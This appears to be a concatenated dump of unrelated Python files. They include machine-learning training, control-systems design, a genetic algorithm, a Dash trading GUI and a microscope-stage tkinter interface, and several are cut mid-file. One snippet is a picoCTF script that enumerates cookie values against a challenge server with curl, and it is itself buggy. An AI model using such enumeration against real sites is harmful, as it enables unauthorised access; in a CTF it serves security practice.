pred = torch.argmax(pred, dim=0)
color = torch.zeros(3, pred.shape[0], pred.shape[1])
for i in range(pred.shape[0]):
for j in range(pred.shape[1]):
color[:,i,j]=torch.tensor(PALETTE[pred[i,j]])
return color/255
# Hyper-parameters
device = "cuda" if torch.cuda.is_available() else "cpu"
lr = 3e-4
lr_step_size = 10
lr_gamma = 0.2
weight_decay = 0.01
batch_size = 2
num_epochs = 50
img_height, img_width, img_channels = 1024//2, 2048//2, 3
label_height, label_width, label_dim = 324, 836, 35
img_dim = img_height*img_width*img_channels
img_dim_str = '({},{},{})'.format(img_height, img_width, img_channels)
label_dim_str = '({},{},{})'.format(label_height, label_width, label_dim)
# Load dataset; img size = 2048*1024*3
i_trans = transforms.Compose([
transforms.ToTensor(),
transforms.Resize((img_height,img_width), interpolation=InterpolationMode.BILINEAR)
])
t_trans = transforms.Compose([
transforms.ToTensor(),
transforms.Resize((label_height,label_width), interpolation=InterpolationMode.NEAREST)
])
dataset = datasets.Cityscapes(root="../../datasets/Cityscapes/", transform=i_trans, target_transform=t_trans,\
split='train',mode='fine', target_type='semantic')
loader = DataLoader(dataset, batch_size=batch_size, shuffle=False, drop_last=False)
# Initialize model and optimizer
model = Unet(img_channels, label_dim).to(device)
#summary(model, (3,1024,512), device=device)
# Initialize optimizer, lr scheduler, and loss function
opt = optim.AdamW(model.parameters(), lr=lr, weight_decay=weight_decay)
scheduler = optim.lr_scheduler.StepLR(opt, step_size=lr_step_size, gamma=lr_gamma)
criterion = nn.CrossEntropyLoss()
# Build result directory
writer = SummaryWriter("logs/")
save_img_dir = "images/sample"
if not os.path.exists(save_img_dir):
os.makedirs(save_img_dir)
path_to_model = 'logs/checkpoints/'
# The image to evaluate after each epoch, save it and its label to the image folder (label needs to be unnormalized)
sample_img = dataset[0][0].unsqueeze(0).to(device)
save_img(dataset[0][0], 'RGB Image', save_img_dir)
save_img(pred2color((dataset[0][1]*255).to(torch.long).squeeze(0), integer=True), 'Gound Truth', save_img_dir)
# Start training
start_time = time.time()
print('Start training: epoch={}, batch_size={}, lr={}, lr_step_size={}, lr_gamma={},\n\
weight_decay={}, img_dim={}, label_dim={}, device={}'\
.format(num_epochs, batch_size, lr,lr_step_size,lr_gamma, weight_decay, img_dim_str, label_dim_str, device))
for epoch in range(num_epochs):
# Sample images
with torch.no_grad():
sample_label = model(sample_img).squeeze(0).cpu()
save_img(pred2color(sample_label), 'Epoch {}'.format(epoch), save_img_dir)
# Train for an epoch
for batch_id, (img, label) in tqdm(enumerate(loader), ascii=True, desc='Epoch {}/{}'\
.format(epoch+1, num_epochs),total=len(loader)):
# Move to GPU if available
img = img.to(device)
label = (label*255).to(torch.long).squeeze(1).to(device)
# Prediction
pred = model(img)
# Calculate loss and backprop
loss = criterion(pred, label)
model.zero_grad()
loss.backward()
opt.step()
# Step lr scheduler
scheduler.step()
# Evaluate after one epoch
print("loss={:.4f}, time={:.2f}".format(loss,time.time()-start_time))
writer.add_scalar('Loss/train', loss, epoch)
# Save model for every epoch
checkpoint.save_checkpoint(path_to_model, 'unet_{}.pt'.format(epoch), model, epoch, opt, scheduler, loss.item())
print('Training finished: time={:.2f}, final loss={:.4f}'\
.format(time.time()-start_time, loss))
| StarcoderdataPython |
3212420 | def get_diagonale_code(grid: str) -> str:
flag=True
temp=grid.split("\n")
for i,j in enumerate(temp):
temp[i]=j.split()
res=""
x=0
y=0
while True:
try:
res+=temp[y][x]
if y==len(temp)-1:
flag=False
elif y==0 and not flag:
flag=True
y+=1 if flag else -1
x+=1
except:
return res | StarcoderdataPython |
164405 | <gh_stars>0
# Quick and dirty script to send cookies to a URL using python used for the picoctf challenge
import os
i = 0
while i != 30: # Number you want to go up to you can also create an array and loop it through that with a for loop
path = "./results.txt"
def command(i):
os.system("curl -v --cookie \"name={0}\" http://mercury.picoctf.net:17781/check >> result.txt".format(i)) # Change cookie value and URL here
i += 1
os.system("clear")
print("Results saved to 'result.txt'")
| StarcoderdataPython |
3236687 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# pvtol_lqr.m - LQR design for vectored thrust aircraft
# RMM, 14 Jan 03
#
#このファイルは、Astrom and Mruray第5章の平面垂直離着陸(PVTOL)航空機の例を使用して、
#LQRベースの設計上の問題をPythonコントロールパッケージの基本機を使って処理します。
#
from numpy import * # NumPy関数
from matplotlib.pyplot import * # MATLAB プロット関数
from control.matlab import * # MATLAB-like 関数
#
# System dynamics
#
# 状態空間形式のPVTOLシステムのダイナミクス
#
# システムのパラメータ
m = 4; # aircraftの質量
J = 0.0475; #ピッチ軸周りの慣性
r = 0.25; #力の中心までの距離
g = 9.8; # 重力定数
c = 0.05; # 減衰係数(推定値)
# dynamicsの状態空間
xe = [0, 0, 0, 0, 0, 0]; # 平衡点
ue = [0, m*g]; # (これらはリストであり行列ではないことに注意してください)
# Dynamics 行列 (*が動作するように行列型を使用する)
A = matrix(
[[ 0, 0, 0, 1, 0, 0],
[ 0, 0, 0, 0, 1, 0],
[ 0, 0, 0, 0, 0, 1],
[ 0, 0, (-ue[0]*sin(xe[2]) - ue[1]*cos(xe[2]))/m, -c/m, 0, 0],
[ 0, 0, (ue[0]*cos(xe[2]) - ue[1]*sin(xe[2]))/m, 0, -c/m, 0],
[ 0, 0, 0, 0, 0, 0 ]])
# Input 行列
B = matrix(
[[0, 0], [0, 0], [0, 0],
[cos(xe[2])/m, -sin(xe[2])/m],
[sin(xe[2])/m, cos(xe[2])/m],
[r/J, 0]])
# Output 行列
C = matrix([[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0]])
D = matrix([[0, 0], [0, 0]])
#
# xy位置のstepに対応する入力と出力を構築する
#ベクトルxdおよびydは、システムの所望の平衡状態である状態に対応する。
#行列CxおよびCyは、対応する出力である。
#
# これらのベクトルは、閉ループシステムのダイナミクスを次のように計算することで使用される。
#
# xdot = Ax + B u => xdot = (A-BK)x + K xd
# u = -K(x - xd) y = Cx
#
# 閉ループ動特性は、入力ベクトルとしてK * xdを用いて「step」コマンドを使用してシミュレートすることができる
# (「入力」は単位サイズであると仮定し、xdは所望の定常状態に対応する)。
#
xd = matrix([[1], [0], [0], [0], [0], [0]]);
yd = matrix([[0], [1], [0], [0], [0], [0]]);
#
# 関連するダイナミクスを抽出してSISOライブラリで使用する
#
# 現在のpython-controlライブラリはSISO転送関数しかサポートしていないので、
# 元のMATLABコードの一部を修正してSISOシステムを抽出する必要があります。
# これを行うために、横(x)および縦(y)ダイナミクスに関連する状態からなるように、
# 「lat」および「alt」インデックスベクトルを定義します。
#
# 私たちが状態変数
lat = (0,2,3,5);
alt = (1,4);
#分離されたダイナミックス
Ax = (A[lat, :])[:, lat]; #!なぜこのようにしなければならないのか分からない!
Bx = B[lat, 0]; Cx = C[0, lat]; Dx = D[0, 0];
Ay = (A[alt, :])[:, alt]; #!なぜこのようにしなければならないのか分からない!
By = B[alt, 1]; Cy = C[1, alt]; Dy = D[1, 1];
# plotラベル
clf();
suptitle("LQR controllers for vectored thrust aircraft (pvtol-lqr)")
#
# LQR design
#
# 対角行列の重み付け
Qx1 = diag([1, 1, 1, 1, 1, 1]);
Qu1a = diag([1, 1]);
(K, X, E) = lqr(A, B, Qx1, Qu1a); K1a = matrix(K);
# ループを閉じる: xdot = Ax - B K (x-xd)
# Note: python-controlでは、この入力を一度に行う必要があります
# H1a = ss(A-B*K1a, B*K1a*concatenate((xd, yd), axis=1), C, D)
# (T, Y) = step(H1a, T=linspace(0,10,100));
# 最初の入力に対するステップ応答
H1ax = ss(Ax - Bx*K1a[0,lat], Bx*K1a[0,lat]*xd[lat,:], Cx, Dx);
(Yx, Tx) = step(H1ax, T=linspace(0,10,100));
# 第2入力に対するステップ応答
H1ay = ss(Ay - By*K1a[1,alt], By*K1a[1,alt]*yd[alt,:], Cy, Dy);
(Yy, Ty) = step(H1ay, T=linspace(0,10,100));
subplot(221); title("Identity weights")
# plot(T, Y[:,1, 1], '-', T, Y[:,2, 2], '--'); hold(True);
plot(Tx.T, Yx.T, '-', Ty.T, Yy.T, '--'); hold(True);
plot([0, 10], [1, 1], 'k-'); hold(True);
axis([0, 10, -0.1, 1.4]);
ylabel('position');
legend(('x', 'y'), loc='lower right');
# 異なる入力重みを見る
Qu1a = diag([1, 1]); (K1a, X, E) = lqr(A, B, Qx1, Qu1a);
H1ax = ss(Ax - Bx*K1a[0,lat], Bx*K1a[0,lat]*xd[lat,:], Cx, Dx);
Qu1b = (40**2)*diag([1, 1]); (K1b, X, E) = lqr(A, B, Qx1, Qu1b);
H1bx = ss(Ax - Bx*K1b[0,lat], Bx*K1b[0,lat]*xd[lat,:],Cx, Dx);
Qu1c = (200**2)*diag([1, 1]); (K1c, X, E) = lqr(A, B, Qx1, Qu1c);
H1cx = ss(Ax - Bx*K1c[0,lat], Bx*K1c[0,lat]*xd[lat,:],Cx, Dx);
[Y1, T1] = step(H1ax, T=linspace(0,10,100));
[Y2, T2] = step(H1bx, T=linspace(0,10,100));
[Y3, T3] = step(H1cx, T=linspace(0,10,100));
subplot(222); title("Effect of input weights")
plot(T1.T, Y1.T, 'b-'); hold(True);
plot(T2.T, Y2.T, 'b-'); hold(True);
plot(T3.T, Y3.T, 'b-'); hold(True);
plot([0 ,10], [1, 1], 'k-'); hold(True);
axis([0, 10, -0.1, 1.4]);
# arcarrow([1.3, 0.8], [5, 0.45], -6);
text(5.3, 0.4, 'rho');
# 出力重み付け - 出力を使用するようにQxを変更する
Qx2 = C.T * C;
Qu2 = 0.1 * diag([1, 1]);
(K, X, E) = lqr(A, B, Qx2, Qu2); K2 = matrix(K)
H2x = ss(Ax - Bx*K2[0,lat], Bx*K2[0,lat]*xd[lat,:], Cx, Dx);
H2y = ss(Ay - By*K2[1,alt], By*K2[1,alt]*yd[alt,:], Cy, Dy);
subplot(223); title("Output weighting")
[Y2x, T2x] = step(H2x, T=linspace(0,10,100));
[Y2y, T2y] = step(H2y, T=linspace(0,10,100));
plot(T2x.T, Y2x.T, T2y.T, Y2y.T)
ylabel('position');
xlabel('time'); ylabel('position');
legend(('x', 'y'), loc='lower right');
#
# 物理的に動機付けされた重み付け
#
# xで1 cmの誤差、yで10 cmの誤差で決定する。
# 角度を5度以下に調整して調整する。
# 効率の低下により、サイドの力にはペナルティを課す。
#
Qx3 = diag([100, 10, 2*pi/5, 0, 0, 0]);
Qu3 = 0.1 * diag([1, 10]);
(K, X, E) = lqr(A, B, Qx3, Qu3); K3 = matrix(K);
H3x = ss(Ax - Bx*K3[0,lat], Bx*K3[0,lat]*xd[lat,:], Cx, Dx);
H3y = ss(Ay - By*K3[1,alt], By*K3[1,alt]*yd[alt,:], Cy, Dy);
subplot(224)
# step(H3x, H3y, 10);
[Y3x, T3x] = step(H3x, T=linspace(0,10,100));
[Y3y, T3y] = step(H3y, T=linspace(0,10,100));
plot(T3x.T, Y3x.T, T3y.T, Y3y.T)
title("Physically motivated weights")
xlabel('time');
legend(('x', 'y'), loc='lower right');
show()
| StarcoderdataPython |
1602304 | from grapl_analyzerlib.grapl_client import GraphClient
from grapl_analyzerlib.prelude import (
BaseView,
)
from graplinc.grapl.api.graph.v1beta1.types_pb2 import MergedNode
def view_from_proto(graph_client: GraphClient, node: MergedNode) -> BaseView:
return BaseView(
node.uid,
node.node_key,
graph_client,
node_types={node.node_type},
)
| StarcoderdataPython |
4805555 | import unittest
import pandas as pd
from Parsers.Onlineparser import OnlineParser
from Parsers.csv_parser import CsvParser
from Processing.SingleColumnConcer import DataframeConcer
class MyTestCase(unittest.TestCase):
def test_online_table(self):
self.assertEqual(OnlineParser("https://www.rivm.nl/media/milieu-en-leefomgeving/hoeschoonisonzelucht/",
"Groningen").get_data_frame().iloc[:, [2, 3]].sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/Onlinetester_groningen.csv', index_col=0).sum(numeric_only=True).sum(), msg="The site might have been changed for Groningen")
self.assertEqual(OnlineParser("https://www.rivm.nl/media/milieu-en-leefomgeving/hoeschoonisonzelucht/",
"Flevoland").get_data_frame().iloc[:, [2, 3]].sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/Onlinetester_flevoland.csv', index_col=0).sum(numeric_only=True).sum(), msg="The site might have been changed for Flevoland")
def test_csv_parser(self):
self.assertEqual(CsvParser('Data/03759ned_UntypedDataSet_07022020_153926.csv',
"Groningen").get_data_frame().iloc[:, [2, 6]][1:].sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/CsvTester_groningen.csv', index_col=0)['Leeftijd'].sum(), msg="Csv Parser is not working for Groningen")
self.assertEqual(CsvParser('Data/03759ned_UntypedDataSet_07022020_153926.csv',
"Flevoland").get_data_frame().iloc[:, [2, 6]][1:].sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/CsvTester_flevoland.csv', index_col=0)['Leeftijd'].sum(), msg="Csv Parser is not working for Flevoland")
def test_column_concer(self):
self.assertEqual(DataframeConcer(CsvParser('Data/70262ned_UntypedDataSet_05022020_180935.csv',
"Groningen").get_data_frame().iloc[:, [1, 3, 4]], CsvParser('Data/70262ned_UntypedDataSet_05022020_180935.csv',
"Groningen").get_data_frame().iloc[:, [1, 3, 4]]).get_data_frame().sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/Concertester_groningen.csv').sum(numeric_only=True).sum(), msg="Something is not adding up...")
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
15570 | <filename>modules/util/objects/query_parts/postgres_query_part.py
class PostgresQueryPart:
""" Object representing Postgres query part
"""
def get_query(self) -> str:
""" Get query
Returns:
str
"""
pass
| StarcoderdataPython |
1604140 | <reponame>aspferraz/GeneticAlgorithm
'''
File name: main.py
Author: <NAME>
Date created: 11/20/2020
Date last modified: 11/25/2020
Python Version: 3.8
'''
import struct
import math
import numpy as np
import random
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
DEFAULT_PRECISION = 6
def float_to_bin(num):
return format(struct.unpack('!I', struct.pack('!f', num))[0], '032b')
def bin_to_float(binary):
return struct.unpack('!f', struct.pack('!I', int(binary, 2)))[0]
def rand_decision(probability):
return random.random() < probability
# changes according to the problem
def fitness(x):
if -1 <= x <= 2:
f = x * math.sin(10 * math.pi * x) + 1
else:
f = float('-inf')
return round(f, DEFAULT_PRECISION)
def calc_population_fitness(population):
f = np.empty(len(population))
for c_idx in range(len(population)):
c = population[c_idx]
f[c_idx] = fitness(bin_to_float(c))
return f
def select_best_individuals(population, population_fitness, rate=0.5):
fitness_copy = np.copy(population_fitness)
selected_qtt = np.uint16(len(population) * rate)
best_individuals = np.empty(selected_qtt, dtype="<U32")
for parent_idx in range(selected_qtt):
max_fitness_idx = np.where(fitness_copy == np.max(fitness_copy))
max_fitness_idx = max_fitness_idx[0][0]
best_individuals[parent_idx] = population[max_fitness_idx]
fitness_copy[max_fitness_idx] = float('-inf')
return best_individuals
def select_individuals(population, population_fitness, rate=0.5):
fitness_copy = np.copy(population_fitness)
selected_qtt = np.uint16(len(population) * rate)
parents = np.empty(selected_qtt, dtype="<U32")
if rate < 1:
max_fitness = np.max(fitness_copy)
population_idx = 0
while '' in parents:
if population_idx == len(population):
population_idx = 0
current_fitness = fitness_copy[population_idx]
if rand_decision(current_fitness / max_fitness):
parent_idx = np.where(parents == '')[0][0]
parents[parent_idx] = population[population_idx]
fitness_copy[population_idx] = float('-inf')
population_idx += 1
else:
parents = np.copy(population)
return parents
def crossover(parents, rate=0.7):
offspring = np.empty(parents.shape[0], dtype="<U32")
sample = random.sample(range(parents.shape[0]), np.uint16(parents.shape[0] * rate))
point = np.uint8(len(parents[0]) / 2 + 1)
for k in range(offspring.shape[0]):
if k in sample:
parent1_idx = k % parents.shape[0]
parent2_idx = (k + 1) % parents.shape[0]
signal = str(np.uint8(parents[parent1_idx][0]) * np.uint8(parents[parent2_idx][0]))
child = signal + parents[parent1_idx][1:point] + parents[parent2_idx][point:]
offspring[k] = child
else:
offspring[k] = parents[k]
return offspring
def mutation(population, rate=0.01):
for idx in range(population.shape[0]):
chromosome = population[idx]
for gene_idx in range(32):
if rand_decision(rate):
new_gene = '0' if chromosome[gene_idx] == '1' else '1'
population[idx] = '%s%s%s' % (chromosome[:gene_idx], new_gene, chromosome[gene_idx + 1:])
return population
def plot_results(data_frame):
# defines font size and line width
sns.set(font_scale=1, rc={"lines.linewidth": 2})
# defines plot size
plt.rcParams["figure.figsize"] = [20, 10]
grid = sns.lineplot(data=data_frame, x="time", y="best value in population", hue="mutation rate",
style="mutation rate")
grid.set(yscale="log")
plt.show()
def run(population_size, domain_limits, generations=5, model='generational', selection_rate=1.0, elitism_rate=0.1,
crossover_rate=0.7, mutation_rate=0.01):
if model == 'steady-state':
if selection_rate >= 1:
raise ValueError('selection_rate must be < 1 if model is steady-state')
else: # generational
if selection_rate != 1:
raise ValueError('selection_rate must be 1 if model is generational')
phenotypes = np.random.uniform(domain_limits[0], domain_limits[1], [population_size])
population = list(map(lambda x: float_to_bin(round(x, DEFAULT_PRECISION)), phenotypes))
results = {}
for generation in range(1, generations + 1):
if not generation % 10:
print('Generation:', generation)
population_fitness = calc_population_fitness(population)
if not generation % 10:
results[f"{mutation_rate}:{generation}"] = np.max(population_fitness)
parents = select_individuals(population, population_fitness, rate=selection_rate)
elite = select_best_individuals(population, population_fitness, elitism_rate)
offspring = crossover(parents, rate=crossover_rate)
offspring = mutation(offspring, rate=mutation_rate)
# Creating the new population based on the parents and offspring.
if elite.shape[0]:
population[0:elite.shape[0]] = elite
remaining_population_size = (len(population) - parents.shape[0]) - elite.shape[0]
if remaining_population_size > 0:
population[elite.shape[0]: elite.shape[0] + remaining_population_size] = np.random.choice(
parents[elite.shape[0]:],
remaining_population_size)
population[elite.shape[0] + remaining_population_size:] = offspring
else:
population[elite.shape[0]:] = \
offspring[: offspring.shape[0] + remaining_population_size]
return results
if __name__ == '__main__':
models = ('generational', 'steady-state')
data = run(100, (-1, 2), generations=200, model=models[1], selection_rate=0.85, elitism_rate=0.01,
crossover_rate=0.9, mutation_rate=0.01)
data.update(run(100, (-1, 2), generations=200, model=models[1], selection_rate=0.85, elitism_rate=0.01,
crossover_rate=0.9, mutation_rate=0.05))
data.update(run(100, (-1, 2), generations=200, model=models[1], selection_rate=0.85, elitism_rate=0.01,
crossover_rate=0.9, mutation_rate=0.1))
df = pd.DataFrame.from_dict(data, orient="index", columns=["best value in population"])
df["mutation rate"] = [i.split(":")[0] for i in df.index]
df["time"] = [int(i.split(":")[1]) for i in df.index]
print(df.head(100))
plot_results(df)
| StarcoderdataPython |
1767879 | from modules.file import *
| StarcoderdataPython |
80942 | <gh_stars>0
class Sources:
"""
Sources class to define source object
"""
def __init__(self, id, name, description, url):
self.id = id
self.name = name
self.description = description
self.url = url
class Articles:
"""
Articles class to define articles object
"""
def __init__(self, author, title, description, url, urlToImage):
self.author = author
self.title = title
self.description = description
self.url = url
self.urlToImage = urlToImage
self.publishedAt = publishedAt
| StarcoderdataPython |
4810380 | # -*- coding: utf-8 -*-
"""
"""
import uuid
from rmfriend import exceptions
from rmfriend.content import Content
from rmfriend.pagedata import PageData
from rmfriend.metadata import MetaData
from rmfriend.notebook import Notebook
from rmfriend.lines.notebooklines import NotebookLines
class NotebookOPS(object):
"""
"""
@classmethod
def new_from_pages(cls, source, pages):
"""Return a new Notebook from the selected pages of another
:param source: The source notebook.Notebook instance.
:param pages: A list of page indicies to export from the source.
If a page number is not found then exceptions.PageNotFoundError will be
raised.
:returns: A new notebook.Notebook with the copied pages.
"""
found_pages = []
# verify the pages exist in the source notebook and recover the
# individual Page instances we can put into a new book.
for page_number in pages:
try:
page = source.lines.pages[page_number]
except IndexError:
raise exceptions.PageNotFoundError(
"Page not found '{}'".format(page_number)
)
else:
found_pages.append(page)
document_id = str(uuid.uuid4())
metadata = MetaData.new()
pagedata = PageData.new()
content = Content.new()
lines = NotebookLines.new(pages=found_pages)
return Notebook(
document_id=document_id,
metadata=metadata,
pagedata=pagedata,
content=content,
lines=lines,
)
| StarcoderdataPython |
197793 | <filename>traderGUI.py
import json
import os
import dash
import dash_core_components as dcc
import dash_html_components as html
import zmq
from dash.dependencies import Input, Output
from util import *
params = {'ready': 0,
'posUpperLimit': 0,
'posLowerLimit': 0,
'spread': 10.0,
'buysellSkew': 0.0,
'alphaMultiplier': 0.0,
'positionSkew': 0.0}
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
def createZmqPublisher():
context = zmq.Context()
publisher = context.socket(zmq.PUB)
publisher.bind(commandEndPoint)
return publisher
def valueSetter(value, name):
params[name] = value
print(params)
return 'changed'
def createLayout():
page_content = []
for key in params:
page_content.append(
html.Div([html.Div(["{:<20}:".format(key)]), dcc.Input(id=key, type='float', value=params[key]),
html.Div(id=key + "state", children='ready', style={'display': 'none'})]))
page_content.append(html.Button('Submit', id='submit-val', n_clicks=0))
page_content.append(html.Div(id='state'))
return html.Div(page_content)
app = dash.Dash(__name__,external_stylesheets=external_stylesheets)
app.layout = createLayout # dynamic layout creation
@app.callback(Output('state', 'children'),
[Input('submit-val', 'n_clicks')])
def buttonReact(click):
print("ready")
pub.send_string(commandTopic + json.dumps(params))
print(os.getpid())
return str(params)
for key in params:
app.callback(Output(component_id=key + 'state', component_property='children'),
[Input(component_id=key, component_property='value'),
Input(component_id=key, component_property='id')])(valueSetter)
if __name__ == '__main__':
pub = createZmqPublisher()
app.run_server(debug=False, threaded=True, host='0.0.0.0')
| StarcoderdataPython |
3376198 | # -*- coding: utf-8 -*-
"""
Created on Fri Nov 9 08:49:09 2018
@author: TIM
"""
import tkinter as tk
from tkinter import simpledialog
from tkinter.filedialog import askdirectory
from tkinter.filedialog import askopenfilename
from tkinter.filedialog import askopenfile
from tkinter import messagebox
from PIL import ImageTk, Image
#import Stage.maerzhaeuser as st
import time
import numpy as np
class MyDialog(simpledialog.Dialog):
'''
This class is used to get numbers as input from the user.
'''
def body(self, master):
tk.Label(master, text="x-Pos. in Sample Coord:").grid(row=0)
tk.Label(master, text="y-Pos. in Sample Coord:").grid(row=1)
self.e1 = tk.Entry(master,width = 50)
self.e2 = tk.Entry(master, width = 50)
self.e1.grid(row=0, column=1)
self.e2.grid(row=1, column=1)
def apply(self):
first = self.e1.get()
second = self.e2.get()
self.result = {'x_sample': first, 'y_sample': second}
class UserInterfaceCallBack():
'''
This class is used to have instant feedback on the screen when moving
stage or microscope.
'''
def __init__(self, GB):
self.GB = GB
self.cancel = False
def get_focuspos_3vector(self, prompt_text):
'''
This function asks the user to move a little bit away from the edge
and focus manually. When pressing OK the function ends.
'''
def up50():
self.GB.microscope.moveZRelative(50)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
def down50():
self.GB.microscope.moveZRelative(-50)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
def up5():
self.GB.microscope.moveZRelative(10)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
def down5():
self.GB.microscope.moveZRelative(-10)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
def ok():
root.destroy()
root.quit()
return
def on_closing():
root.destroy()
root.quit()
self.cancel = True
return
self.cancel = False
root = tk.Tk()
root.geometry("239x113+450+400")
root.attributes("-topmost", True)
root.title('Focus Manually')
frame = tk.Frame(root)
frame.grid(row=0)
message = tk.Label(frame)
message.config(text=prompt_text)
message.grid(row=1, columnspan=4)
prompt = tk.Label(frame)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
DOWN50_button = tk.Button(frame, text='--', width=10, command=down50)
DOWN50_button.grid(row=2, column=0)#, columnspan=2)
UP50_button = tk.Button(frame, text='++', width=10, command=up50)
UP50_button.grid(row=2, column=2)#, columnspan=2)
DOWN5_button = tk.Button(frame, text='-', width=10, command=down5)
DOWN5_button.grid(row=3, column=0)#, columnspan=2)
UP5_button = tk.Button(frame, text='+', width=10, command=up5)
UP5_button.grid(row=3, column=2)#, columnspan=2)
OK_button= tk.Button(frame, text='OK', width=10, command=ok)
OK_button.grid(row=4, column=1)#, columnspan=2)
root.protocol("WM_DELETE_WINDOW", on_closing)
tk.mainloop()
def focusing_and_changing_objectives_manually(self, prompt_text):
'''
This function lets the user change the objective and focus manually.
'''
def up50():
self.GB.microscope.moveZRelative(50)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
def down50():
self.GB.microscope.moveZRelative(-50)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
def up5():
self.GB.microscope.moveZRelative(10)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
def down5():
self.GB.microscope.moveZRelative(-10)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
def objm():
self.GB.microscope.moveObjectiveBackwards()
objective.config(text='Obj: {obj}x'.format(obj = str(self.GB.microscope.getCurrentObjective())))
objective.grid(row=3, column=1)
def objp():
self.GB.microscope.moveObjectiveForward()
objective.config(text='Obj: {obj}x'.format(obj = str(self.GB.microscope.getCurrentObjective())))
objective.grid(row=3, column=1)
def cancel():
root.destroy()
root.quit()
self.cancel = True
return
self.cancel = False
root = tk.Tk()
root.geometry("239x113+450+400")
root.attributes("-topmost", True)
root.title('Focus Manually')
frame = tk.Frame(root)
frame.grid(row=0)
message = tk.Label(frame)
message.config(text=prompt_text)
message.grid(row=1, columnspan=4)
z_value = tk.Label(frame)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
objective = tk.Label(frame)
objective.config(text='Obj: {obj}x'.format(obj = str(self.GB.microscope.getCurrentObjective())))
objective.grid(row=3, column=1)
DOWN50_button = tk.Button(frame, text='--', width=10, command=down50)
DOWN50_button.grid(row=2, column=0)#, columnspan=2)
UP50_button = tk.Button(frame, text='++', width=10, command=up50)
UP50_button.grid(row=2, column=2)#, columnspan=2)
DOWN5_button = tk.Button(frame, text='-', width=10, command=down5)
DOWN5_button.grid(row=3, column=0)#, columnspan=2)
UP5_button = tk.Button(frame, text='+', width=10, command=up5)
UP5_button.grid(row=3, column=2)#, columnspan=2)
OBJM_button= tk.Button(frame, text='Obj-', width=10, command=objm)
OBJM_button.grid(row=4, column=0)#, columnspan=2)
OBJP_button= tk.Button(frame, text='Obj+', width=10, command=objp)
OBJP_button.grid(row=4, column=2)#, columnspan=2)
CANCEL_button= tk.Button(frame, text='Cancel', width=10, command=cancel)
CANCEL_button.grid(row=4, column=1)#, columnspan=2)
root.protocol("WM_DELETE_WINDOW", cancel)
tk.mainloop()
def reload_sample(self, edge1, edge2):
'''
This functions takes two tuples (which are the edges SW, SE)
and then opens a userinterface which gives the user the opportunity to
load a txt file (with 12 positions each) and move to these positions by
button click.
Parameters
----------
edge1: tuple
coordinates of edge SW
edge2: tuple
coordinates of edge SE
'''
self.cancel = False
self.filepath = None
self.positions = None
def goTo1():
if len(self.positions)>0:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[0][1],
self.positions[0][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo2():
if len(self.positions)>1:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[1][1],
self.positions[1][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo3():
if len(self.positions)>2:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[2][1],
self.positions[2][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo4():
if len(self.positions)>3:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[3][1],
self.positions[3][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo5():
if len(self.positions)>4:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[4][1],
self.positions[4][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo6():
if len(self.positions)>5:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[5][1],
self.positions[5][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo7():
if len(self.positions)>6:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[6][1],
self.positions[6][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo8():
if len(self.positions)>7:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[7][1],
self.positions[7][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo9():
if len(self.positions)>8:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[8][1],
self.positions[8][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo10():
if len(self.positions)>9:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[9][1],
self.positions[9][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo11():
if len(self.positions)>10:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[10][1],
self.positions[10][2],
edge1, edge2)
